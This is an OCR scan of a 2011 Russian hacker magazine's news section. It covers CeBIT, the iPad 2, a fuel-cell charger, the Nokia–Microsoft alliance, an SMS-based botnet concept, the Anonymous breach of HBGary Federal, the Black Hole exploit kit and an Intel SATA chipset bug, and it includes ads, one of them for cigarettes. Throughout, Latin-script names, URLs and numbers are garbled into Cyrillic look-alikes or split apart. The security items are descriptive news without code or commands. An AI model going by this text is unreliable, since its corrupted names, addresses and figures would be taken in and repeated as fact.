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ІГОО 



Поездка на СеВІТ пришлась на самое неудоб- 
ное для меня время: начало марта -это разгар 
сдачи апрельского номера, и нужно иметьочень 
вескую причину, чтобы покинуть редакцию в 
этотпериод. Нознаменитый СеВІТ, прошедший 
за последние 20 лет путь отярмарки пылесосов 
до одной из главных ІТ-выставок мира, несо- 
мненно, такой причинойявляется. 

4200 компаний из 70 стран, 340 000 посетителей 
со всего мира, 380 000 м 2 стендов с новейшим 
железом и софтом. Но главное — отличная 
площадка для общения с представителями ве- 
дущих ІТ-компаний и большой журналистской 
братией. Благо уютный Ганновер с аутентичным 
немецким пивом располагает. 

Лично для меня это и стало главным итогом 
поездки: все-таки СеВІТ уже давно нето ме- 
сто, от которого ждешь каких-то сюрпризов 
и неожиданных ярких релизов. Тут все давно 
очень размеренно и ожидаемо. По сути, это 
просто огромная выставка, где можно получить 



сконцентрированное представление об общих 
тенденциях на рынке и увидеть в одном месте 
кучу самых разнообразныхлюдей: начиная с 
СЕО крупных компаний и заканчивая юными 
ганноверскими дрочерам и, зашедшими подна- 
брать халявных блокнотиков. 

Раз ужя заговорил про выставки и конферен- 
ции, никак нельзя обойти вниманием и другое 
недавнее событие, которому посвящена об- 
ложка этого номера. Речь идет, понятное дело, о 
конференции Віаск НаС которая прошла не- 
давно в Вашингтоне и особеннознаменательна 
тем, что на ней выступал в роли докладчика наш 
постоянный автор Саша Поляков. Аплодирую 
Штукеру и рекомендую тебе немедленно про- 
листать журнал до 64 страницы, чтобы ознако- 
миться с его черно-шляпным отчетом. 

Приятного чтения! 

пікі*022,гл.ред.Х 

исіаіііе.ііѵеіоигпаі.сот 
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ЗАРЯДКА «ПРОСТО ДОБАВЬ ВОДЫ!» 



Безумные концепты автономных зарядныхустройств (например, ра- 
ботающие на Соіа’е, фекалиях или в связке с педальным приводом) не 
такая уж редкость, но беда в том, что они редко оказываются работоспо- 
собны. Устройство под названием Роѵѵегіхекк тоже отличает некоторая 
гикнутость, но, как ни странно, девайс при этом вполне готов к выходу на 
большой рынок. Роѵѵегіхекк — это беспроводная портативная топлив- 
ная ячейка, в которой рольтопливного элемента исполняетсменный 
картридже силицидом натрия, производящий водород, который реком- 
бинируется с кислородом в протон-обменной мембране. В ходе этого 
безопасного химического процесса производится ток в 1 000 мА. Так как 
процесс непрерывен, а в устройстве также предусмотрена аккумулятор- 
ная батарея на 1600 мА, получается, что Роѵѵегіхекк «заряжен» постоян- 
но. Говоря простым человеческим языком, чтобы использовать устрой- 
ство, нужно лишь вставить в него картридж и добавить воды. Диаметр 
картриджа 52 мм, высота — 19 мм и он весит всего 30 г. Чтобы получить 4 
Вт/ч электроэнергии, необходимо 1 5 мл воды. Девайсу не нужно подза- 
ряжаться от сети, а значит, его можно использовать вдали от цивилиза- 
ции, где просто нетэлектричества. Корпус Роѵѵегіхекк, кстати, устойчив к 
ударам и является водонепроницаемым. Заряжать от Роѵѵегіхекк можно 




практически любое устройство, которое умеет питаться от 115В. Хотя 
Роѵѵегіхекк не является концептом (это реально существующий и рабо- 
тающий девайс), и уже даже есть информация, что картриджи для него 
будут продаваться по 5, 10 и 24 шт. в упаковке, до сих пор не названы ни 
цены, ни даты выхода Роѵѵегіхекк в продажу. Надеемся, что это времен- 
но, так как у этого девайса определенно есть потенциал. 



» Портал Агзіесііпіса приводит интересную статистику: порядка 30% 
раздач на крупных торрент-трекерах - мусор, специально созданный 
антипиратами (для борьбы с Р2Р и усложнения жизни пользователям). 



ПРЕДСТАВЛЕН Ш 2 




Итак, свершилосьдолгожданное для многихсобытие — компания Арріе 
представила публике іРаб 2 и рассказала, какие изменения претерпел 
популярный планшетник. В первую очередьобновления коснулись 
габаритов устройства: корпус стал тоньше на целых 33% (8.8 мм — это 
даже меньше, чему ірЬопе 4) , плюсдевайс полегчал на 10%. Несмотря на 
это, теперь іРаб оснащается сразу двумя камерами: задней, которая спо- 



собна записывать видео в разрешении 720р, и фронтальной, благодаря 
которой стало возможно видеообщение через РасеТіте. Увеличилась и 
общая производительность устройства, ведь за скромными габаритами 
скрывается новейший двухъядерный процессор А5, который в два раза 
быстрее и в девять раз более производителен при обработке графики 
по сравнению со своим предшественником (А4). Экран, аккумулятор (и, 
соответственно, время «жизни» от одного полного заряда), а также цены 
остались без изменений. іРаб 2 представлен в двух цветовых вариантах 
— черном и белом, а привнести некоторое разнообразие призваны новые 
чехлы Бппагісоѵег всех цветов радуги. Этотлюбопытный и полезный ак- 
сессуар не только защищает экран, но и может свернуться «в трубочку» и 
служить п одета в ко й , а та кже а вто матическивключаетіРасІприоткрытии. 
Изготавливаются чехлы из полиуретана ($39) или кожи ($69). Также стоит 
упомянуть и второй новый аксессуар — НБМІ-переходникс поддержкой 
1080р. Он автоматически заряжает і Раб (а та кже іРЬопе4 и іРоб ІюисЫ 
при просмотре видео, стоит $39. В продажу іРаб 2 поступитуже в конце 
марта. На всякий случай напоминаем порядокцен: модели сѴѴі-Рі — $499 
за 1 6-ги га байтную, $599 за 32-гигабайтную и $699 за 64- гига байтную 
версии. Модели сѴѴі-Рі и 30 — $629, $729 и $829 соответственно. 



► 004 



ХАКЕР 04 /147/ 201 1 




ѴѴіпсІоѵѵз®. Жизнь без преград. 
АЗІІЗ рекомендует ОС ѴѴіпбоѵѵз 7. 



Іпзрігіпд Іппоѵаііоп • Регзізіепі Регіесііоп 

Ноутбуки А5ІІ5 серии N 

на базе процессоров Іпіеі® Соге™ І5 

ПОЧУВСТВУЙ МОЩЬ ЖИВОГО ЗВУКА 




Благодаря эксклюзивной технологии ЗопісМазІег, разработанной 
в сотрудничестве со специалистами фирмы Вапд & Оіиізеп, ноутбук АЗЫЗ 
N73^, оснащенный процессором Іпіеі® Соге™ і5 и подлинной операционной 
системой ѴѴіпсІоѵѵз® 7 Домашняя расширенная, обеспечивает четкий, насыщен- 
ный, глубокий звук, который нельзя было услышать раньше ни на каком ином 
мобильном компьютере. Помимо выдающейся аудиосистемы в этом ноутбуке 
реализована технология Зирег НуЬгісІ Епдіпе, которая увеличивает производи- 
тельность на 7 процентов*, современный интерфейс ЫЗВ 3.0 и функция Ѵісіео 
Мадіс, увеличивающая качество стандартных видеоматериалов до уровня 
РиІІ-НЮ 1080р. Ноутбуки АЗІІ5 серии N с аудиосистемой ЗопісМазІег подарят 
вам совершенно новые ощущения! 



* Зависит от конфигурации. 




ѵѵѵѵѵѵ.азиз.ги 

ѵѵѵѵѵѵ.азизпЬ.ги 

Всемирная гарантия 2 года 

Горячая линия АЗІІ5: (495) 23-11-999, 8-800-100-2787 

Информацию о том, где купить ноутбуки А51І5, можно найти на сайте ѵѵѵѵѵѵ.азизпЬ.ги 

Іпіеі, логотип ІпіеІ, ІпіеІ Іпзісіе, Іпіеі Соге и Соге Іпзісіе являются товарными знаками корпорации ІпіеІ на территории США и других стран. 

Товар сертифицирован, на правах рекламы. 




Быстрее. 

Умнее. 



ѵ_ 




МЕ6АЫЕШ5 



НОВАЯ «ЧИТАЛКА» ОТ ѴѴЕХІ.ЕР 

Рынокустройств для чтения последние годы рос в геометрической прогрессии. Если 
парулет назад при подборе ридера обычно сетовали на скудный выбор, то теперь 
возникаетобратная проблема — сложно сориентироваться в изобилии девайсов. По- 
зволь немного помочьтебе в этом вопросе, познакомив с ридером ѴѴехІег.Ьоок Е5001 . 
Новая «читалка» от ѴѴехІег построена вокруг пятидюймового дисплея (600x800), 
выполненного на основетехнологии электронных чернил Е-іпк. Основной козырь 
данной технологии — низкое энергопотребление: около месяца от одногозаряда 
аккумулятора (при интенсивном чтении заряда хватаетболее чем на 1 1 000 страниц). 
Читать с ѴѴехІег.Ьоок Е5001 можно практически что угодно, так как электронная книга 
понимаетвсе наиболее распространенные и востребованные форматы. На дисплее 
шестнадцать градаций серого (кстати, неплохо смотрится и техническая литература 
с иллюстрациями, и черно-белые комиксы :)). Девайс оснащается встроенной памя- 
тью на 4 Гб (в этот объем можно уместить до 200 000 книг), которая при желании может 
быть расширена до 20 Гб за счет внешних карточек формата МісгоЗО. Но помимо 
хорошей «начинки» ридер может похвастаться и прекрасным экстерьером. На выбор 
предлагается один из десяти ярких, необычных цветов алюминиевого корпуса, кото- 
рый дополнительно защищает и украшает обложка из натуральной кожи судобным 
креплением. С компьютером все это счастье соединяется через порт тІпі-ЦІЗВ, а 
прослушатьаудиокниги, музыку и ЕМ-радио можно с помощьюудобных наушников. 
Рекомендованная цена девайса — 5990 рублей. 





МісгозоН рапортует о первых успехах обновленной мобильной платформы 
- уже продано более 2 млн аппаратов на базе ѴМоѵѵз РІіопе 7. 



ДВА ЭКРАНА ЛУЧШЕ, НЕМ ОДИН 




В скором будущем нас ожидает нашествие 
смартфонов, укомплектованных сразудвумя 
экранами. В последнее время появилисьанонсы 
двух подобныхустройств — от компаний Еи фзи 
и Куосега Соттипісабопз. Японцы из Куосега 



СоттипісаЬопз представили АпбгоісІ-смартфон 
Куосега ЕсЬо, оснащенный двумя сенсорными 
экранами размером поЗ.бдюйма каждый и 
разрешением800х480. Машинка получилась 
довольно мощная: процессор Оиаісотт 
Впарсігадоп 0508650 (1 ГГц), 512 Мб оперативной 
памяти (РАМ), 1 Гб флэш-памяти. Также нали- 
чествуют поддержка тісгоЗБ (до 32 Гб), камера 
разрешением 5 Мп с автофокусом и вспышкой, 
беспроводные адаптеры ѴѴі-Еі и ВІиеІооіЬ, ак- 
селерометр, цифровой компас, 6Р5. Но главная 
фишка, это, конечно, два дисплея. Одновремен- 
но на каждом из них могут выполняться разные 
задачи, и один может служить продолжением 
другого. Например, на одном экране может 
отображаться виртуальная клавиатура, а на 
другом — вкладка браузера. В комплект поставки 
устройства входят также запасная батарея, док- 
станция и карта памяти объемом 8 Гб. 



Девайс от компании Еи фзи еще хитрее. Его 
точныетехнические характеристики пока не 
названы, так как Еи фзи продемонстрировала 
на выставке МѴѴС201 1 Еифзи л ишь прототип, 
но уже сейчас ясно, что этотаппарат имеет куда 
большие возможности трансформации. Благо- 
даря общему складному основанию располагать 
экраны можно как параллельно друг другу, так и 
перпендикулярно, а также можно поворачивать 
их один относительно другого. Дисплеи, кстати, 
тоже сенсорные и примернотогоже размера, 
что у Куосега ЕсЬо. Прототип пока работает под 
управлением ЗутЬіап, но известно, что коммер- 
ческий вариант будетуправляться АпбгоісІ. 

Что касается цен — Куосега ЕсЬо уже продается 
натерритории СШАпо цене$200, но это при 
условии заключения контракта с оператором со- 
товой связи на два года. В нашей странеустрой- 
ство врядли будет стоить меньше $800-1 000. 



ХАКЕР-РЕАЛИТИ 



В последнее времятема хакеров (в исконном понимании этого слова) и ІТ 
стала весьма популярной. Например, о ЕасеЬооксняли фильм, успешно 
заработавший себе пару Оскаров, а про ѴѴікіІеакз и Ассанджа не писал 
и не говорил только ленивый. Очевидно, компания ЫОАТТ Зесигку 
ІпіегпаЬопаІ, работающая в сфере компьютерной безопасности, решила 
неупускать возможность попиариться на волне интереса ^компьютер- 
ному миру», и из этого желания родился довольно любопытный проект. 

В скором будущем на одном изамериканскихтелеканалов состоится 



премьера первого в мире реалити-шоу о хакерах. Программа, которую 
планируюттранслировать ежедневно, будет повествовать о тяжелых 
рабочих буднях ІТ-безопасников (в лице сотрудников ЫВАТТ Зесигку 
ІпіегпаЬопаІ) — например, о борьбе с сетевыми угрозами, поиске уязви- 
мостей и способах борьбы сними. По словам исполнительного директора 
компании Грегори Эванса, телевизионщики очень за интересовались про- 
ектом и дали «зеленый свет», одна ко точную дату выхода шоу и название 
телеканала, который взялся за его съемки, Эванс пока называть не стал. 



► 006 
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РЕКЛАМА I 





Узнай больше наѵѵѵѵѵѵ.ІтІаЬ.ги 



ГАРМОНИЯ В ДЕТАЛЯХ. 



Мягкий вкус. Мировое качество. 

Неизменная цена*. 



* Максимальная розничная цена 31 рубль за пачку в период с июня 2010 года по настоящее время. 



МИНЗДРАВСОЦРАЗВИТИЯ РОССИ 
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ИТ ВАШЕМУ ЗДОРОВЬЮ 




МЕ6АЫЕШ5 



МІСР050РТ И ШІА - НОВЫЙ АЛЬЯНС 



Рынок мобильныхустройств взбудоражила 
новость о заключении партнерства между 
двумя гигантами — софтверным и телекомму- 
никационным. Впрочем, не сам факт сотруд- 
ничества между ІЧокіа и МісгозоіЧ всколыхнул 
массы (само по себе это не новость, начало 
альянсу было положено давно], а известие о 
том, что их партнерство разрастается, переходя 
от мелочей вроде совместной разработки (Жісе 
Мобііе к более глобальным проектам. В част- 
ности, стало известно, что ІЧокіа очень скоро 
планирует начать выпусктелефонов на базе 
ѴѴі псіоѵѵз Рбопе 7, и в ближайшем будущем ѴѴР7 
станет основной ОС для финских аппаратов. В 
связи с этим трубок на платформе ЗутЬіап ста- 
нетзначительно меньше, хотя отказываться от 
«Симбиана» полностью компания не собирает- 



ся. Также ходили неприятные слухи о «похо- 
ронах» совместной разработки Іпіеіи ІЧокіа — 
открытой платформы МееОо, но они, ксчастью, 
пока не подтвердились. Что нам готовит столь 
тесное партнерство, и какихждать изменений? 
Пока известно не так много подробностей, как 
хотелось бы, вот некоторые их них: поисковый 
движок Віпд и система контекстной рекламы 
асІСепІегтеперь станут базовыми для устройств 
и сервисов ІЧокіа. Служба N окіа Марз, в свою 
очередь, станетосновой для картографических 
сервисов МісгозоТС. Магазины приложений 
ІЧокіа Зіюге и МісгозоТС Магкеіріасе объединят- 
ся в единую службу. Разработчики и специали- 
сты ІЧокіа будут принимать непосредственное 
участие в работе над платформой ѴѴіпсІоѵѵз 
РЬопе. 




» Мо 2 ІІІа опубликовала первые результаты работы программы 

премирования пользователей. За два неполных месяца юзеры нашли 
уязвимостей на $40 000! И это с учетом того, что «стандартная» выплата за 
ошибку равна примерно $500, а самые сочные баги оцениваются в $3000. 




АНАЛОГ, УХОДИ! 

Цифровое телевидение — звучит гордо, но в России с ним знакомы в 
основном понаслышке. Дело в том, что вещание в нашей стране до сих 
пор ведется по большей части в аналоговом режиме. Тем не менее, 
планы у настрадиционно далекоидущие: к 201 5 году Россия (кстати, как 
и Китай] планирует перейти на цифровоетелевидение полностью. Но как 
ускорить этот процесс, чтобы уложиться в сроки и сделать его безболез- 
ненным? Недавно светна этотвопрос пролил глава Минкомсвязи Игорь 
Щеголев. Он сообщил, что в скором времени планируется подготовить 
законопроект, согласно которому будет установлен запрет на ввоз и про- 
изводство в Россиителевизионных приемников, не поддерживающих 
цифровой сигнал. Говоря простым языком, телевизоры без поддержки 
«цифры» запретят. «Мы выбрали мягкий способ отключения аналогово- 
го вещания, — подчеркивает Щеголев, — это произойдеттолько тогда, 
когда у большинства граждан будет доступ к цифровому сигналу». Спор- 
ное заявление, учитывая, что в этой же дискуссии обсуждались и специ- 
альные цифровые ТВ-приставки, которые придется покупать людям, 
чьи телевизоры внезапно окажутся аутсайдерами. Данные девайсы, 
якобы, будут сопоставимы по цене с обычным мобильником, а льготные 
категории населения даже получат субсидии на их покупку. Разумеется, 
уже есть прототипы этихустройств российского производства, при по- 
мощи которых можно будет не только смотретьтелевизор, но и выходить 
в интернет, а также (ну конечно!) пользоваться услугами электронного 
правительства. Впереди большие затраты. Но вотскажи, а нужно ли это 
цифровоеТВтебе? Воти мы неуверены. 
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НТС Н07 



Интересный слух прошел недавно по Сети: 
якобы группа разработчиков под руковод- 
ством Джулиана Чепмена готовит к релизу 
софтину под названием ѴѴіпбоѵѵз РЬопе 7 
Оеѵісе Мападег. Вся соль в том, что соглас- 
но заявлениям разработчиков, данное ПО 
позволит не только установить на телефон 
сторонние приложения, но и поможет по- 
лучитьдоступ кзакрытым отлюбопытных 
глаз и шаловливых ручек разделам ОС — в 
частности, к файловой системе. Да, получа- 
ется, что ѴѴіпбоѵѵз Рбопе 7 Оеѵісе Мападег 
есть не что иное, как второй джейлбрейк для 
ѴѴіпбоѵѵз Рбопе 7 (первым был СЬеѵгоп ѴѴР7], 
однако тут есть небольшая загвоздка. Чеп- 
мен и его коллеги являются противниками 
пиратства, в будущем надеются на дли- 
тельное и благополучное сотрудничество с 
Місгозоіі и, в общем-то, не ставили себе цели 
создавать джейлбрейк. Так что полноценного 
релиза программы можно ожидать только 
после выхода Зегѵісе Раск 1 для ѴѴіпбоѵѵз 
РЬопе 7, который ожидается в самом скором 
времени. Пока доступна только бета-версия 
проги, найти которую можно по адресу 
іоисЬхрепепсе.сот . Из интересных нюансов 
работы программы можно отметить новые 



способы ухода от системы верификации. 
Детище Чепмена и Ко позволяет открывать 
и закрывать систему верификации, чтобы 
юзер мог снова активировать функцию про- 
верки программ на подлинность. Дело в том 
что включение системы верификации ѴѴР7 



происходит автоматически после каждой 
связи с се рве ром обновлений (каждые две 
недели], так что если пользователь хочет ис- 
пользовать смартфон в режиме отключенной 
верификации, ему придется перезапускать 
программу минимум раз в две недели. 



За прошлый год Роскомнадзор нашел в электронных СМИ целых 45 
комментариев, содержащих намеки на экстремизм (их следовало 
отредактировать или удалить). С ума сойти, сколько работы у этих людей. 

8МЗ-Б0ТНЕТ 

Мобильные устройства — лакомый кусочек для хакеров, что наглядно подтверждает стати- 
стика: количество малваря, ориентированного на мобильныедевайсы, растет деньото дня. 

Однако, если строишь ботнет в мобильных сетях, нужны несколько отличные от обычных схемы 
распространения «заразы» и управления зомби-сетью. ІР-протокол врядли является в данном 
случае оптимальным вариантом, ведь мобильные ресурсы скромны и ограниченны, а работа 
с ІР-протоколом получается неудобной и невыгодной —такую активность легко обнаружить. 

Зато если использовать для черныххакерскихделишекстекЗМЗ-сообщений с обработчиком- 
ботом, анализирующим входящие сообщения и выполняющим основные функции узла ботнета 
(ООоЗ-атака, рассылка спама, установка новых функций итакдалее], как было предложено на 
конференции ЗЬтооСоп 201 1 , получается уже лучше. Представленный концептЗМЗ-ботнета, 
продемонстрированный пока на примере АпбгоісІ, имеет классическую иерархическую 
структуру — управляющий бот, распределяющий и подчиненный. При этом средний уровень 
изащищает«верхушку»отобнаружения, служа своеобразным буфером, и передает команды 
управляющего бота нижним звеньям цепи. Пока единственные минусы, которые видитв своем 
прототипе автор, — немалая вероятность обнаружения странной активности мобильными опе- 
раторами, а также небольшая длина 5М5-сообщений, из-за которой длинные команды при- 
ходится кодировать. В остальном схема работоспособна и, можно сказать, удобна. К сожалению 
(или ксчастью?), автор не пожелал выкладывать все исходники и наработки в открытый доступ, 
таккакнехочетлишних проблем. Впрочем, со всемижелающими энтузиастами и разработчи- 
ками он все же обещал поделиться, нужно лишь попросить. Почитать подробности, посмотреть 
видео и ознакомиться с кодом можно в блогеавтора: дгтп00Ь5.сопп/201 І/ОІ/ЗО/зтагІрЬопе- 
сосіе-геІеазе-^ог-зЬтоосоп . 
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АНОНИМУС НЕ ПРОЩАЕТ 

Ты наверняка слышал о 
масштабных акциях про- 
теста, которые устраивались 
«хактивистами» из ТЬе 
Апопутоііз пару месяцев 
назад во время пика шумихи 
вокруг ѴѴікіБеакз. Если же 
нет, то поясняем — парни 
устраивали ООоБ-атаки, 
ломали и терроризировали 
как целые организации, 
выступающие против 
Ассанджа и его сайта (под 

раздачу попали РауРаІ, Мазіегсагсі, Церкви Сайентологии, а 
также множество копирастов], так и отдельных личностей. Сейчас 
этот пожар немного утих, зато «анонимных» мстителей начали 
пачками вычислять и повсеместно арестовывать. Газета Ріпапсіаі 
Тітез, очевидно, решила немного раздуть эти угли, засветив в 
своей статье имя эксперта в области безопасности Аарона Барра, 
который, какоказалось, провел детальное расследование и лично 
вычислил 45 членов группы, включая лидеров. Важное уточнение: 
Барр является директором компании НВСагу Ребегаі — дочернего 
предприятия известной компании НВСагу, специализирующейся 
на компьютерной безопасности и принадлежащей писателю, ха- 
керу и геймеру Грегу Хогланду, о котором мы не раз рассказывали. 
Детектив из Барра вышел неплохой — при помощи левыхучетных 
записей в РасеЬоок, наблюдения за ІВС-каналами, где собираются 
Ано ни мусы, а также сетевых изысканий, помноженных на профес- 
сионал ьные умения, он сумел добыть весьма ценную информацию 
на членов группы. Однако вся ирония заключается в том, что Барр, 
судя по всему, не передавал эти данные в полицию или ФБР — он 
утверждает, что приберегал их для тематического доклада, с ко- 
торым собирался выступать на конференции Р5А Сопіегепсе 201 1 
в Сан-Франциско. Так ли это? Кто знает. Как бы то ни было, после 
публикации в Ріпапсіаі Тітез Анонимусов уже не сильно заботили 
детали... Вместо привычной ООоС-атаки была развернута целая 
операции возмездия, в ходе которой Апопутоиз’ы вскрыли все, 
до чего сумели добраться: взломали твиттер-аккаунт Барра, сайт 
НВСагу Ребегаі и корпоративную сеть компании. В руки Анониму- 
сов попали налоговая отчетность, более 60 000 писем и так далее. 
Плюс были найдены идентификационные налоговые сертификаты, 
полные версии программных продуктов НВСагу, очищен сервер 
резервного хранения, получен доступ к внутренней АТС, найден 
домашний адрес и номер социального страхования Барра. До- 
брались хактивисты идо ресурсов ЬЬдагу.сот и гооІкіГсот . Все 
найденное на вскрытых ресурсах было незамедлительно распро- 
странено вторрентах (легко находится на ТЬе Рііаге Вау]. Кроме 
того, Анонимусы заявили, что часть собранных Барром данных — 
фикция, и в завершение вакханалии дистанционно стерли всю ин- 
формацию с его іРасІ. Адля тех, кто считает, что Барр пострадал «за 
правду», заметим, что среди бумагего компании были обнаружены 
очень интересные документы. Если им верить, то Барр предлагал 
Вапк оі Атегіса свой проект по «потоплению» ѴѴікіБеакз: кибер- 
атаки, направленные против инфраструктуры ѴѴікіБеакз, с целью 
добыть данные об источниках- поставщиках документов, а затем 
мощный пресс против последних. Или же фабрикация компроме- 
тирующих документов, которые «скармливались» бы ѴѴікіБеакз, а 
потом с помпой разоблачались как подделка. В общем, «скандалы, 
интриги, расследования». Теперьже, после столь масштабной 
операции Анонимусов и слива компромата наБарраикомпаниюв 
Сеть, еще неизвестно, кому стоит опасаться возмездия властей и 
последствий. 
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МЕ6АЫЕШ5 



ЗНАТОКИ ПРОТИВ КОМПЬЮТЕРА 



Игрой в шахматы с компьютером сегодня уже никого не удивить, ведь 
люди начали игратьс машинами еще в80-е годы. Аесли вместо шахмат 
будет интеллектуальная викторина беорагсіу! (прародитель «Своей 
игры»), а вместо обычных ЭВМ — суперкомпьютер ІВМ ѴѴаізоп? Как 
оказалось, компьютер не подвел и здесь. Такая игра действительно 
имела место — совсем недавно в США прошли два уникальных турнира, 
в ходе которыхумнейшие соревновались с разработкой инженеров 
ІВМ. В итоге по сумме двух игр ѴѴаізоп заработал $77 000, более чем 
втрое обогнав сильнейших игроков Эеора гсіу! По общему количеству 
правильных ответов ѴѴаІзоп тоже вне конкуренции —двадцать девять 
против восемнадцати и тринадцати у его человеческих соперников. Зато 



машина ошибалась 
чаще людей: ѴѴаІзоп 
трижды дал неверный 
ответ, вто время как 
игравшие с ним Брэд 
Руттер и Кен Джен- 
нингс ограничились 
одной-двумя ошибками. Стоит отметить, что во время игры детище ІВМ 
не пользовалось никакими внешними источниками данных, все свои 
«знания» суперкомпьютер получил в ходе индексации большого количе- 
ства различныхтекстов. 




» Ученые из Университета Южной Каролины в очередной раз «взвесили 
информацию» и сообщили, что на 2007 год мировой объем сохраненных 
данных составлял 295 эксабайт (295 млрд Гб). 



БАГ В НОВЫХ ЧИПСЕТАХ ШТЕЬ 




Совсем недавно компания Іп1:еІ. торжественно представила мируЗапсІу 
Вгісіде — новую микроархитектуру, основанную на 32-нм техпроцессе. 

За этим последовало закономерное обновление линейки продуктов, с 
которым вышел неприятный и громкий казус. Уже после релиза в чипсе- 
тах шестой серии, известных под условным обозначением Соидаг Роіпі, 
обнаружилась ошибка. Эти чипсеты используются в ПКс процессорами 
I пТеІ Соге второго поколения (ядро ЗапбуВгісІде], и, что самое непри- 
ятное, «лечится» проблема только путем замены чипсета. Затрагивает 
багтолько 5АТА — со временем из-за ошибки разработчиков порты 5АТА 
могут начать «деградировать», что, соответственно, может привести к 



снижению производительности и нарушению функционирования под- 
ключенных к ним устройств. На работу процессоров и других продуктов 
обнаруженная ошибка не влияет. Справедливости ради стоитсказать, 
что в реальности эта проблема вообще коснется очень малого количе- 
ства устройств и людей. Тем не менее, когда о баге стало известно, ком- 
пания Іпіеі приняла трудное, но смелое решение: прекратить поставки 
продукции и остановить выпуск потенциально дефектных чипсетов 
(ошибка уже исправлена и налажено производство исправленной 
версии]. Также в Іпіеі готовы обменять все отгруженные чипсеты и 
системные платы, взяв при этом все расходы на себя. Учитывая масштаб 
«бедствия», это решение вызываетуважение, ведьтакие гиганты, как 
НР, Эей и ТозЫЬа были вынуждены не просто отложить начало поставок 
новых продуктов, но и готовятся к возврату уже проданных систем. Все 
это означаетнемалые финансовые потери — в Іпіеі предварительно 
подсчитали, что на исправление последствий ошибки уйдетоколо 
$700 000 000. Впрочем, тот фа кт, что ошибку обнаружили на раннихста- 
диях, не успев распродать десятки тысяч устройств, все же радует, равно 
каки реакция I пііеі на случившееся. Побольше бы таких ответственных. 



» Місго$оН наконец сделала то, что следовало сделать давно. Вышел патч, 
отключающий в старых версиях ѴѴіпсІоѵѵз функцию автозапуска для всех 
внешних накопителей. Никакого автозапуска с флешек! 



РАДИКАЛЬНОЕ РЕШЕНИЕ 0-0АУ ПРОБЛЕМ 



(іітЕер 



В ходе интервью журналу Сот риІепл/огЫ главный технический директор 
компании Іпіеі Джастин Раттнер, проговорился о новой разработке компа- 
нии. По словам Раттера лучшиеумы в Іпіеі сейчас бьются над созданием 
своего рода аппаратного антивируса, направленного на борьбу суязвимо- 
стями «нулевого дня». Обычное антивирусное ПО, как правило, использует 
для выявления Обау-ата к сигнатурный анализ, который оказывается не 
слишком эффективен. Раттнер подчеркнул, что технология, разрабатывае- 
мая его компанией, не имеет к сигнатурам никакого отношения, строится 



на аппаратной основе, и, скорее всего, будет интегрирована прямо в 
процессор или чипсет. Как ни странно, оказалось, что этот проект был начат 
Іпіеі самостоятельно, ещедо приобретения компании МсАІее (допустить 
до разработки ее инженеров пока только планируется]. Других деталей 
Раттнер раскрывать не стал, нождать подробностей не придется долго 
— релиз новой технологии должен состояться уже во второй половине теку- 
щего года. И говоря «релиз», мы подразумеваем именно вывод новинки на 
рынок, во всяком случае, такзаявил технический директор Іпііеі. 
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ЧЕРНЫЙ РЫНОК НЕ СТОИТ НА МЕСТЕ 



Сразу пара заметных новинок появилась на сете- 
вом черном рынке малваря. О первой сообщила 
компания Эутапіес, заметившая, что набор экс- 
плойтов Віаск Ноіе Ехріоііз КМ: начинаетнаби- 
рать определенную популярность. Набор новый 
и заявлено, что он эффективен в 1 0% случаев, 
что весьма неплохо — жертвами Віаск Ноіе еже- 
дневно становятся порядка 1 00 000 компьютеров. 
Эти цифры вполне сопоставимы с результатами 
таких знаменитых эксплойт-китов какіхіеозріоіі 
и Рбоепіх. Цена годовой «лицензии» на новинку 
не высока — $1500, что также способствует ее по- 
пуляризации. По информации Эутапіес (а также 
судя по источникам распространения и русскоя- 
зычному веб-интерфейсу] тул кит является делом 
рукнашихумельцев. В сборку включены наи- 
более полезные на сегодня уязвимости — Оаѵа, 
НСР (СѴЕ-201 0-1 885], РЭЕ, ІѴЮАС итакдалее. 
Атака на жертву происходит в момент посещения 
ею сайта. Основной фишкой набора является 



криптоалгоритм, шифрующий код эксплойтов, 
получаемый через іігатеот контролирующего 
сервера. Это существенно усложняет обнаруже- 
ниезловреда антивирусным ПО. Разработчики, 
кстати, позиционируютсвою поделку как систему 
сетевого тестирования компьютера на возмож- 
ность несанкционированного проникновения :]. 
Вторую новинку, обретшую нездоровую популяр- 
ность, обнаружила фирма ѴѴеЬзепзе. ТулкитТіпіе 
ЕасеЬоокѴігаІАррІісаІіоп — полная противопо- 
ложность вышеописанному — он прост, дешев, 
рассчитан на безмозглых скрипткиддисов и, увы, 
из-за этого пользуется спросом. Уже из названия 
понятно, что инструментарий ориентирован на 
РасеЬоок.а именно — на генерацию фальшивых 
приложений. Приобрести набор можно всего 
за $25, после чего вредоносные приложения 
можно создавать в оптовых количествах. Тут и 
опросы-ловушки, и предложения узнать, кто 
просматривал твою страницу, и другие нехитрые, 




но безотказно воздействующие на пользовате- 
лей социалокварианты. Разумеется, на самом 
дележертва напарывается либо на приложения, 
распространяющие вирус, либо на средства 
взлома. Дешево и сердито. И чем доступнее 
такие «наборы для дураков», чем они проще, тем 
больше находится желающих попробовать, благо 
никаких специальных навыков и знаний такие 
тул киты не требуют. 



» Ну вот и все. ІСАИИ официально объявили, что пул свободных адресов ІРѵ4 
исчерпан. ІРѵб все ближе, хотя переход на новый протокол вполне может 
занять и пять-десять лет. 



ПЕРВЫЙ НТМІ.5САМР 

Что насособенно радуетв последнее время, такэто бурное развитие 
НТМИб. Движение во многом задают разработчики браузеров, причем не 
только реализуя все фишки нового стандарта, но и активно проводя раз- 
личные мероприятия по популяризации новой технологии. В частности, 
в апреле в Москве состоялась конференция НТМР5 Сатр, посвященная 
новым веб-стандартам. В конференции приняли участие немало инте- 
ресных докладчиков. Вадим Макеев, веб-евангелистОрега Эоііѵѵаге, 
рассказал об особенностях динамической графики с помощью Сапѵаз 
и 5Ѵ0. АФедор Голубев из Яндекса на примере показал, как новые воз- 
можности графики используются в Яндекс. Картах. Интересно было по- 
слушать Николая Котлярова, который поделился опытом портирования 

ИНТЕРНЕТ ДЛЯ РОБОТОВ 

Работа над жутковатым проектом началась в Евросоюзе —там планиру- 
ют создать автономную сеть по образу и подобию интернета, предна- 
значенную для... машин. Начинание носит имя РоЬоЕагіЬ, и у него уже 
есть собственный сайт [ гоЬоеагіЬ.огд ]. Идея проста. У людей есть ѴѴогІсі 
ѴѴібе ѴѴеЬ; есть ѴѴікіребіа, которую наполняют всем миром, а потом де- 
лятся друге другом знаниями. Так почему бы не сделать то же самое для 
машин? Место, где самообучающиеся роботы могли бы обмениваться 
«опытом», где хранились бы единые, удобные для доступа базы данных. 

И это отнюдь не фантастика — первый робот, подключенный к ВоЬоЕагіЬ, 
уже создан инженерами из Технологического института Эйндховена. 

